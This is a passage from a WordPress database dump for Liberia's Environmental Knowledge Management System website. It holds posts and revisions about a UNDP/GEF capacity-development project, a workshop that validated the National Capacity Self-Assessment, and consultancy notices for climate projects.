streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p>\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:</p>\n<h4>Associated Baseline Projects</h4>\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<th><strong>Project Name</strong></th>\n<th><strong>Description of project’s alignment with CCCD project</strong></th>\n</tr>\n<tr>\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)</td>\n<td>The expected results of this project included improving the rural communities’ capacities, increasing sustainable livestock and crop production, and reducing poverty.</td>\n</tr>\n<tr>\n<td>FAO to Support MOA Statistics and Information Management System</td>\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.</td>\n</tr>\n<tr>\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)</td>\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.</td>\n</tr>\n</tbody>\n</table>\n<h3>B. Strategy</h3>\n<h4>B.1 Alternative Strategies</h4>\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.</p>\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project’s objective was formulated.</p>\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies – indeed an important capacity development need that the project would help address. A related issue was the government’s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.</p>\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.</p>\n<h4>B.2 Selected Scenario</h4>\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<p>The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.</p>\n<h4>B.3 Knowledge Management</h4>\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).</p>\n<p>The system that the project developed is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.</p>\n<p>The project’s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).</p>','About','','inherit','closed','closed','','68-revision-v1','','','2022-09-02 10:51:06','2022-09-02 10:51:06','',68,'https://ekmsliberia.info/?p=4995',0,'revision','',0),(4996,42,'2022-08-27 16:21:00','2022-08-27 16:21:00','<!-- wp:paragraph -->\n<p>Liberia has validated the updated National Capacity Self-Assessment (NCSA) Report, a requirement of the Global Environment Facility (GEF) for countries that are signatories to the Rio and Ramsar Conventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The updated NCSA Report was validated at a two-day meeting organized by Environmental Protection Agency (EPA) through the Cross-Cutting Capacity Development (CCCD) Project in collaboration with the United Nations Development Programme (UNDP) with funding from the Global Environment Facility (GEF).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The meeting was held in Kakata, Margibi County from August 26-27, 2022, and brought together representatives of government Line Ministries, Agencies &amp; Commissions (MAC), civil society groups, and institutions of higher learning. &nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia is a signatory to the three key Multilateral Environmental Agreements including the Conventions on Biological Diversity, the United Nations Convention to Combat Desertification, and the United Nations Framework Convention on Climate Change, as well as the Ramsar Convention.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As a signatory to these conventions, the country is updating and reporting on its previous national capacity barriers after 16 years to meet the obligations set under each convention and to meet global environmental objectives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia’s progress started in 2002 with the establishment of the Environmental Protection Agency (EPA), as the government agency responsible for coordinating the government’s response to global environmental management and leading scientific efforts that equip the Liberian populace to make a meaningful contribution toward protecting their environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The separation of the National Fisheries and Aquaculture Authority (NAFAA) from the Ministry of Agriculture; a total of eight (8) National Environmental Policies and legislations or laws were developed for the mainstreaming of the UNFCCC in Liberia; while a total of seven (7) National Environmental Policies and legislation or laws were developed to fully enhance the implementation of the United Nations Convention to Combat Desertification; and a total of twenty-three (23) National Environmental Policies, regulations, and legislation or laws were also developed to enhance the full implementation of the United Nations Convention on Biological Diversity in Liberia which is all detailed in this report, provide the foundation for the full implementation of the three Rio conventions in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prior to 2006, Liberia undertook numerous initiatives to address environmental issues.&nbsp; Despite the achievements Liberia made, the country continues to face important challenges at the time to meet environmental goals.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken through a consultative process and participatory approach that involved numerous stakeholders from various sectors identified barriers that stood in the way of fully mainstreaming the Rio Conventions in Liberia. Some key barriers identified in the 2006 NCSA were; inadequate public awareness and education/training, Inadequate institutions and institutional frameworks, Inadequate political commitment, Inadequate financial resources and economic framework, Inadequate access to information, Inadequate policies and legal frameworks, and lack of an effective mechanism for information processing and sharing, weak institutional coordination amongst others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The objective of the workshop was to share the key findings of the national capacity assessment and gaps and to review and agree on the action plans /recommendations of the draft NCSA report. After the presentations on the findings and action plan by the consultant, the participants made comments and input. The feedback from the participants was incorporated into the final draft of the report, the NCSA report is expected to be published by the end of the last quarter of 2022.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking during the opening of the workshop, Mr. &nbsp;Aaron S. M. Wesseh, Coordinator of the CCCD Project, said the report is a synthesis of findings gathered from capacity assessment undertaken at the national level by national consultants over the last 12 months to set a new baseline for the implementation of the Rio Conventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that the information contained in this report is drawn largely from the three Thematic Assessment Reports: Biodiversity, Climate change, and sustainable land management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The updated National Capacity Self-Assessment and Action Plan will be sold to partners for funding support to further bridge the capacity gaps systemically, institutionally, and individually for Liberia to meet her obligations as a party”, he added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He concluded by saying, “the stocktaking involves identifying all national activities and documents that are relevant to the convention themes as well as core national environmental priorities”.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For their part, Speakers at the workshop talked about the pressing issues of climate change, biodiversity loss, and desertification in Liberia. They were in agreement that the Government of Liberia, with the support of development partners, needs to enhance the capacity of the relevant institutions to address these important environmental issues. The speakers emphasized the need for an Environmental Court for more sustainable management of the country’s natural resource base.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In support of the country implementation of these conventions, the EPA in collaboration with the UNDP embarked on the implementation of the CCCD Project and the updating of the NCSA for Liberia, funded by the GEF.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The CCCD project started in 2018 with the aim of strengthening a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities. The expected outcome of the project is that Liberia will be able to achieve global environmental benefits at a lower transactional cost as well as be able to respond faster and more appropriately to conservation needs.&nbsp; This means: &nbsp;improved access to best practices and best available knowledge, including innovative research; improved coordination, collaboration, and delegation of responsibilities among key agencies and other important organizations; enhance institutional and technical capacities; improved awareness of global environmental values, and update the NCSA to reflect post-2015-SDGs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The various consultative engagements and capacity-building initiatives were held to bridge the capacity gaps that were identified in the 2006 NCSA.</p>\n<!-- /wp:paragraph -->','EPA In Collaboration with UNDP Holds a Meeting to Validate the National Capacity Self-Assessment','','publish','open','closed','','epa-in-collaboration-with-undp-holds-a-meeting-to-validate-the-national-capacity-self-assessment','','','2022-09-13 16:07:34','2022-09-13 16:07:34','',0,'https://ekmsliberia.info/?p=4996',101,'post','',0),(4997,42,'2022-09-07 16:24:25','2022-09-07 16:24:25','','ncsa','','inherit','open','closed','','ncsa','','','2022-09-07 16:24:25','2022-09-07 16:24:25','',4996,'https://ekmsliberia.info/wp-content/uploads/2022/09/ncsa.jpg',0,'attachment','image/jpeg',0),(4998,42,'2022-09-07 16:24:39','2022-09-07 16:24:39','<!-- wp:paragraph -->\n<p>Environmental technicians and civil society representatives are validating Liberia\'s updated National Capacity Self-assessment Draft Report at a forum in Kakata, Margibi County on August 26-27, 2022. The two-day gathering is being held under the auspices of the Cross-Cutting Capacity Development Project funded by the Global Environment Facility in collaboration with the UNDP. The goal of the project is for Liberia to make a better decisions to meet and sustain global environmental obligations.</p>\n<!-- /wp:paragraph -->','EPA In Collaboration with UNDP Holds a Meeting to Validate the National Capacity Self-Assessment','','inherit','closed','closed','','4996-revision-v1','','','2022-09-07 16:24:39','2022-09-07 16:24:39','',4996,'https://ekmsliberia.info/?p=4998',0,'revision','',0),(5000,42,'2022-09-12 15:56:52','0000-00-00 00:00:00','The Environmental Protection Agency (EPA) as mandated by Section 99, of the Environmental Protection and Management Law (EPML) is the principal authority in Liberia responsible for coordinating all Multilateral Environmental Agreements and is empowered to coordinate, monitor, supervise and consult with relevant stakeholders on all activities in the protection of the environment and sustainable use of natural resources. \nWith the adoption of the Paris Agreement (PA), adopted at the 21st Conference of the Parties (COP) to the UNFCCC in December 2015, all countries agreed on an enhanced transparency framework (ETF) for action and support (Article 13), with built-in flexibility which takes into account Parties’ different capacities and builds upon collective experience. The Paris Agreement sets out a global action plan that puts the world on track to avoid dangerous climate change by limiting global warming to well below 2°C. It establishes that each individual Party should submit a Nationally Determined Contribution and revise it every five years in order to achieve the global goal of reducing greenhouse gas (GHG) emissions. In fulfillment of this agreement, Liberia submitted its NDC on April 4, 2022 to the UNFCCC Secretariat through the Environmental Protection Agency. Liberia committed to reducing its economy-wide greenhouse gas emissions by 64% below the projected business-as-usual level by 2030.\n','Service Provider- Development of Project Implementation Plan for BTR/TNC','','draft','closed','closed','','','','','2022-09-12 15:56:52','2022-09-12 15:56:52','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5000',46,'document','',0),(5001,42,'2022-08-03 15:57:07','2022-08-03 15:57:07','The Environmental Protection Agency (EPA) as mandated by Section 99, of the Environmental Protection and Management Law (EPML) is the principal authority in Liberia responsible for coordinating all Multilateral Environmental Agreements and is empowered to coordinate, monitor, supervise and consult with relevant stakeholders on all activities in the protection of the environment and sustainable use of natural resources.\r\nWith the adoption of the Paris Agreement (PA), adopted at the 21st Conference of the Parties (COP) to the UNFCCC in December 2015, all countries agreed on an enhanced transparency framework (ETF) for action and support (Article 13), with built-in flexibility which takes into account Parties’ different capacities and builds upon collective experience. The Paris Agreement sets out a global action plan that puts the world on track to avoid dangerous climate change by limiting global warming to well below 2°C. It establishes that each individual Party should submit a Nationally Determined Contribution and revise it every five years in order to achieve the global goal of reducing greenhouse gas (GHG) emissions. In fulfillment of this agreement, Liberia submitted its NDC on April 4, 2022 to the UNFCCC Secretariat through the Environmental Protection Agency. Liberia committed to reducing its economy-wide greenhouse gas emissions by 64% below the projected business-as-usual level by 2030.\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ToR_PIP-development.pdf\" target=\"_blank\" rel=\"noopener\">Service Provider</a></em></strong>\r\n\r\n&nbsp;','Service Provider- Development of Project Implementation Plan for BTR/TNC','','publish','closed','closed','','service-provider-development-of-project-implementation-plan-for-btr-tnc','','','2022-09-12 16:01:33','2022-09-12 16:01:33','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5001',68,'ekms_bulletin','',0),(5002,42,'2022-09-12 15:58:40','2022-09-12 15:58:40','','ToR_PIP development','','inherit','open','closed','','tor_pip-development','','','2022-09-12 15:58:40','2022-09-12 15:58:40','',0,'https://ekmsliberia.info/wp-content/uploads/2022/09/ToR_PIP-development.pdf',0,'attachment','application/pdf',0),(5003,42,'2022-09-12 16:01:33','2022-09-12 16:01:33','The Environmental Protection Agency (EPA) as mandated by Section 99, of the Environmental Protection and Management Law (EPML) is the principal authority in Liberia responsible for coordinating all Multilateral Environmental Agreements and is empowered to coordinate, monitor, supervise and consult with relevant stakeholders on all activities in the protection of the environment and sustainable use of natural resources.\r\nWith the adoption of the Paris Agreement (PA), adopted at the 21st Conference of the Parties (COP) to the UNFCCC in December 2015, all countries agreed on an enhanced transparency framework (ETF) for action and support (Article 13), with built-in flexibility which takes into account Parties’ different capacities and builds upon collective experience. The Paris Agreement sets out a global action plan that puts the world on track to avoid dangerous climate change by limiting global warming to well below 2°C. It establishes that each individual Party should submit a Nationally Determined Contribution and revise it every five years in order to achieve the global goal of reducing greenhouse gas (GHG) emissions. In fulfillment of this agreement, Liberia submitted its NDC on April 4, 2022 to the UNFCCC Secretariat through the Environmental Protection Agency. Liberia committed to reducing its economy-wide greenhouse gas emissions by 64% below the projected business-as-usual level by 2030.\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ToR_PIP-development.pdf\" target=\"_blank\" rel=\"noopener\">Service Provider</a></em></strong>\r\n\r\n&nbsp;','Service Provider- Development of Project Implementation Plan for BTR/TNC','','inherit','closed','closed','','5001-revision-v1','','','2022-09-12 16:01:33','2022-09-12 16:01:33','',5001,'https://ekmsliberia.info/?p=5003',0,'revision','',0),(5004,42,'2022-09-12 16:01:38','2022-09-12 16:01:38','The Environmental Protection Agency (EPA) as mandated by Section 99, of the Environmental Protection and Management Law (EPML) is the principal authority in Liberia responsible for coordinating all Multilateral Environmental Agreements and is empowered to coordinate, monitor, supervise and consult with relevant stakeholders on all activities in the protection of the environment and sustainable use of natural resources.\nWith the adoption of the Paris Agreement (PA), adopted at the 21st Conference of the Parties (COP) to the UNFCCC in December 2015, all countries agreed on an enhanced transparency framework (ETF) for action and support (Article 13), with built-in flexibility which takes into account Parties’ different capacities and builds upon collective experience. The Paris Agreement sets out a global action plan that puts the world on track to avoid dangerous climate change by limiting global warming to well below 2°C. It establishes that each individual Party should submit a Nationally Determined Contribution and revise it every five years in order to achieve the global goal of reducing greenhouse gas (GHG) emissions. In fulfillment of this agreement, Liberia submitted its NDC on April 4, 2022 to the UNFCCC Secretariat through the Environmental Protection Agency. Liberia committed to reducing its economy-wide greenhouse gas emissions by 64% below the projected business-as-usual level by 2030.\n\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ToR_PIP-development.pdf\" target=\"_blank\" rel=\"noopener\">Service Provider</a></em></strong>\n\n&nbsp;','Service Provider- Development of Project Implementation Plan for BTR/TNC','','inherit','closed','closed','','5001-autosave-v1','','','2022-09-12 16:01:38','2022-09-12 16:01:38','',5001,'https://ekmsliberia.info/?p=5004',0,'revision','',0),(5005,42,'2022-09-13 09:50:33','2022-09-13 09:50:33','The Liberian capital Monrovia is particularly vulnerable to climate effects, namely sea level rise and the increased frequency of high-intensity storms. This has resulted in coastal erosion and shoreline retreat, which threatens the sustainability of ecosystem services and directly impacts Monrovians\' fishery-based livelihoods of approximately 55,000 Monrovians, 46% of whom are women.\r\n\r\nThe Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Monrovia Metropolitan Climate Resilience Project (MMCRP), financed by the Green Climate Fund (GCF), through the United Nations Development Program (UNDP) and the Government of Liberia (GoL). The core aim of the Project is to build the long-term climate resilience of coastal communities in\r\n\r\nLiberia by both addressing immediate adaptation priorities and creating an enabling environment for up-scaling coastal adaptation initiatives to other parts of Monrovia and Liberia.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Intl-Consultant_ToR-for-developing-TORs-High-resolution-Multi-criteria-assessment.pdf\" target=\"_blank\" rel=\"noopener\">Consultant Wanted</a></strong></em>','Consultancy for Internal Consultant to Develop ToR for Conducting a High-Resolution Multi-Criteria Vulnerability Assessment','','publish','closed','closed','','consultancy-for-internal-consultant-to-develop-tor-for-conducting-a-high-resolution-multi-criteria-vulnerability-assessment','','','2022-09-13 09:50:33','2022-09-13 09:50:33','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5005',67,'ekms_bulletin','',0),(5006,42,'2022-09-13 09:49:19','2022-09-13 09:49:19','','Intl Consultant_ToR-for-developing-TORs-High-resolution-Multi-criteria assessment','','inherit','open','closed','','intl-consultant_tor-for-developing-tors-high-resolution-multi-criteria-assessment','','','2022-09-13 09:49:19','2022-09-13 09:49:19','',0,'https://ekmsliberia.info/wp-content/uploads/2022/09/Intl-Consultant_ToR-for-developing-TORs-High-resolution-Multi-criteria-assessment.pdf',0,'attachment','application/pdf',0),(5007,42,'2022-09-13 09:50:33','2022-09-13 09:50:33','The Liberian capital Monrovia is particularly vulnerable to climate effects, namely sea level rise and the increased frequency of high-intensity storms. This has resulted in coastal erosion and shoreline retreat, which threatens the sustainability of ecosystem services and directly impacts Monrovians\' fishery-based livelihoods of approximately 55,000 Monrovians, 46% of whom are women.\r\n\r\nThe Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Monrovia Metropolitan Climate Resilience Project (MMCRP), financed by the Green Climate Fund (GCF), through the United Nations Development Program (UNDP) and the Government of Liberia (GoL). The core aim of the Project is to build the long-term climate resilience of coastal communities in\r\n\r\nLiberia by both addressing immediate adaptation priorities and creating an enabling environment for up-scaling coastal adaptation initiatives to other parts of Monrovia and Liberia.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Intl-Consultant_ToR-for-developing-TORs-High-resolution-Multi-criteria-assessment.pdf\" target=\"_blank\" rel=\"noopener\">Consultant Wanted</a></strong></em>','Consultancy for Internal Consultant to Develop ToR for Conducting a High-Resolution Multi-Criteria Vulnerability Assessment','','inherit','closed','closed','','5005-revision-v1','','','2022-09-13 09:50:33','2022-09-13 09:50:33','',5005,'https://ekmsliberia.info/?p=5007',0,'revision','',0),(5008,42,'2022-09-13 09:50:39','2022-09-13 09:50:39','The Liberian capital Monrovia is particularly vulnerable to climate effects, namely sea level rise and the increased frequency of high-intensity storms. This has resulted in coastal erosion and shoreline retreat, which threatens the sustainability of ecosystem services and directly impacts Monrovians\' fishery-based livelihoods of approximately 55,000 Monrovians, 46% of whom are women.\n\nThe Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Monrovia Metropolitan Climate Resilience Project (MMCRP), financed by the Green Climate Fund (GCF), through the United Nations Development Program (UNDP) and the Government of Liberia (GoL). The core aim of the Project is to build the long-term climate resilience of coastal communities in\n\nLiberia by both addressing immediate adaptation priorities and creating an enabling environment for up-scaling coastal adaptation initiatives to other parts of Monrovia and Liberia.\n\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Intl-Consultant_ToR-for-developing-TORs-High-resolution-Multi-criteria-assessment.pdf\" target=\"_blank\" rel=\"noopener\">Consultant Wanted</a></strong></em>','Consultancy for Internal Consultant to Develop ToR for Conducting a High-Resolution Multi-Criteria Vulnerability Assessment','','inherit','closed','closed','','5005-autosave-v1','','','2022-09-13 09:50:39','2022-09-13 09:50:39','',5005,'https://ekmsliberia.info/?p=5008',0,'revision','',0),(5009,42,'2022-09-13 16:07:33','2022-09-13 16:07:33','<!-- wp:paragraph -->\n<p>Liberia has validated the updated National Capacity Self-Assessment (NCSA) Report, a requirement of the Global Environment Facility (GEF) for countries that are signatories to the Rio and Ramsar Conventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The updated NCSA Report was validated at a two-day meeting organized by Environmental Protection Agency (EPA) through the Cross-Cutting Capacity Development (CCCD) Project in collaboration with the United Nations Development Programme (UNDP) with funding from the Global Environment Facility (GEF).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The meeting was held in Kakata, Margibi County from August 26-27, 2022, and brought together representatives of government Line Ministries, Agencies &amp; Commissions (MAC), civil society groups, and institutions of higher learning. &nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia is a signatory to the three key Multilateral Environmental Agreements including the Conventions on Biological Diversity, the United Nations Convention to Combat Desertification, and the United Nations Framework Convention on Climate Change, as well as the Ramsar Convention.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As a signatory to these conventions, the country is updating and reporting on its previous national capacity barriers after 16 years to meet the obligations set under each convention and to meet global environmental objectives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia’s progress started in 2002 with the establishment of the Environmental Protection Agency (EPA), as the government agency responsible for coordinating the government’s response to global environmental management and leading scientific efforts that equip the Liberian populace to make a meaningful contribution toward protecting their environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The separation of the National Fisheries and Aquaculture Authority (NAFAA) from the Ministry of Agriculture; a total of eight (8) National Environmental Policies and legislations or laws were developed for the mainstreaming of the UNFCCC in Liberia; while a total of seven (7) National Environmental Policies and legislation or laws were developed to fully enhance the implementation of the United Nations Convention to Combat Desertification; and a total of twenty-three (23) National Environmental Policies, regulations, and legislation or laws were also developed to enhance the full implementation of the United Nations Convention on Biological Diversity in Liberia which is all detailed in this report, provide the foundation for the full implementation of the three Rio conventions in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prior to 2006, Liberia undertook numerous initiatives to address environmental issues.&nbsp; Despite the achievements Liberia made, the country continues to face important challenges at the time to meet environmental goals.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken through a consultative process and participatory approach that involved numerous stakeholders from various sectors identified barriers that stood in the way of fully mainstreaming the Rio Conventions in Liberia. Some key barriers identified in the 2006 NCSA were; inadequate public awareness and education/training, Inadequate institutions and institutional frameworks, Inadequate political commitment, Inadequate financial resources and economic framework, Inadequate access to information, Inadequate policies and legal frameworks, and lack of an effective mechanism for information processing and sharing, weak institutional coordination amongst others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The objective of the workshop was to share the key findings of the national capacity assessment and gaps and to review and agree on the action plans /recommendations of the draft NCSA report. After the presentations on the findings and action plan by the consultant, the participants made comments and input. The feedback from the participants was incorporated into the final draft of the report, the NCSA report is expected to be published by the end of the last quarter of 2022.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking during the opening of the workshop, Mr. &nbsp;Aaron S. M. Wesseh, Coordinator of the CCCD Project, said the report is a synthesis of findings gathered from capacity assessment undertaken at the national level by national consultants over the last 12 months to set a new baseline for the implementation of the Rio Conventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that the information contained in this report is drawn largely from the three Thematic Assessment Reports: Biodiversity, Climate change, and sustainable land management.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The updated National Capacity Self-Assessment and Action Plan will be sold to partners for funding support to further bridge the capacity gaps systemically, institutionally, and individually for Liberia to meet her obligations as a party”, he added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He concluded by saying, “the stocktaking involves identifying all national activities and documents that are relevant to the convention themes as well as core national environmental priorities”.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For their part, Speakers at the workshop talked about the pressing issues of climate change, biodiversity loss, and desertification in Liberia. They were in agreement that the Government of Liberia, with the support of development partners, needs to enhance the capacity of the relevant institutions to address these important environmental issues. The speakers emphasized the need for an Environmental Court for more sustainable management of the country’s natural resource base.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In support of the country implementation of these conventions, the EPA in collaboration with the UNDP embarked on the implementation of the CCCD Project and the updating of the NCSA for Liberia, funded by the GEF.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The CCCD project started in 2018 with the aim of strengthening a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities. The expected outcome of the project is that Liberia will be able to achieve global environmental benefits at a lower transactional cost as well as be able to respond faster and more appropriately to conservation needs.&nbsp; This means: &nbsp;improved access to best practices and best available knowledge, including innovative research; improved coordination, collaboration, and delegation of responsibilities among key agencies and other important organizations; enhance institutional and technical capacities; improved awareness of global environmental values, and update the NCSA to reflect post-2015-SDGs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The various consultative engagements and capacity-building initiatives were held to bridge the capacity gaps that were identified in the 2006 NCSA.</p>\n<!-- /wp:paragraph -->','EPA In Collaboration with UNDP Holds a Meeting to Validate the National Capacity Self-Assessment','','inherit','closed','closed','','4996-revision-v1','','','2022-09-13 16:07:33','2022-09-13 16:07:33','',4996,'https://ekmsliberia.info/?p=5009',0,'revision','',0),(5010,42,'2022-09-14 14:08:00','2022-09-14 14:08:00','','cari liberia','','inherit','open','closed','','cari-liberia','','','2022-09-14 14:08:00','2022-09-14 14:08:00','',1592,'https://ekmsliberia.info/wp-content/uploads/2019/11/cari-liberia.jpg',0,'attachment','image/jpeg',0),(5011,42,'2022-09-14 14:08:29','2022-09-14 14:08:29','CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.\r\n\r\nCARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.','Central Agricultural Research Institute','','inherit','closed','closed','','1592-revision-v1','','','2022-09-14 14:08:29','2022-09-14 14:08:29','',1592,'https://ekmsliberia.info/?p=5011',0,'revision','',0),(5012,42,'2022-09-14 14:23:29','2022-09-14 14:23:29','','lnbc','','inherit','open','closed','','lnbc','','','2022-09-14 14:23:29','2022-09-14 14:23:29','',1604,'https://ekmsliberia.info/wp-content/uploads/2019/11/lnbc.jpg',0,'attachment','image/jpeg',0),(5013,42,'2022-09-14 14:30:14','2022-09-14 14:30:14','','mof','','inherit','open','closed','','mof','','','2022-09-14 14:30:14','2022-09-14 